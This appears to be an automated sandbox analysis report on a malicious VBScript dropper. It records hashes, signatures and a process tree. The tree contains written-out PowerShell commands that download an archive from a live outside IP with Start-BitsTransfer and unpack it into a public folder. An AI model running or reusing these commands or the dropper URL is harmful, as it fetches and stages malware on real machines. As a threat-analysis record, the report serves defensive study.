75e7e4a0cfee9bdc0640cd9efcbab1c09ef1552f1abaf35c5dbb15955b1994cf

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
16-05-2024 09:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23.vbs
Size

765B
MD5

f20392bba3e6958992646b0f76a78dd9
SHA1

9ed260c4d4d971b150c4d44468c6968d1476457a
SHA256

75e7e4a0cfee9bdc0640cd9efcbab1c09ef1552f1abaf35c5dbb15955b1994cf
SHA512

02662eebc665938ac53b79b65bfd57ac6e39252e1e32364ffdbb0a7df2c248b778677a12f05a4708a25b703aa5a69896e39a8bd1fc5de434a3cf3fa850d12c8b

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://154.17.167.74/90/RKJ.jpg

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2128	powershell.exe
2736	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 2128	3008	WScript.exe	28
PID 3008 wrote to memory of 2128	3008	WScript.exe	28
PID 3008 wrote to memory of 2128	3008	WScript.exe	28
PID 3008 wrote to memory of 2736	3008	WScript.exe	30
PID 3008 wrote to memory of 2736	3008	WScript.exe	30
PID 3008 wrote to memory of 2736	3008	WScript.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://154.17.167.74/90/RKJ.jpg' -Destination 'C:\Users\Public\bbbb.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HIOBKPUVZ7CLMKOG5UGE.temp

Filesize
7KB

MD5
62f78e9c8706bec48512a51e9cbd0420

SHA1
7550ede29e2c82e83f1831f7252fcda73e2129d9

SHA256
b8636ba0a5692eb96405687fa2e2b668dbb3c605cb88cdd77d90ac0148906aea

SHA512
06aaa57c9e8cdbc2a91b5e9b883ed0a322aecd5046f0f6684bf73d9b0f82dbf9529482f170c5604ef35b67443f61f5dfce0157bfd7c13e12f62f15f73d110a8c

Download Submit
memory/2128-4-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp

Filesize
4KB

Download
memory/2128-5-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2128-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2128-8-0x00000000029B4000-0x00000000029B7000-memory.dmp

Filesize
12KB

Download
memory/2128-9-0x00000000029BB000-0x0000000002A22000-memory.dmp

Filesize
412KB

Download
memory/2128-7-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

Filesize
9.6MB

Download
memory/2128-17-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

Filesize
9.6MB

Download
memory/2736-15-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2736-16-0x00000000026A0000-0x00000000026A8000-memory.dmp

Filesize
32KB

Download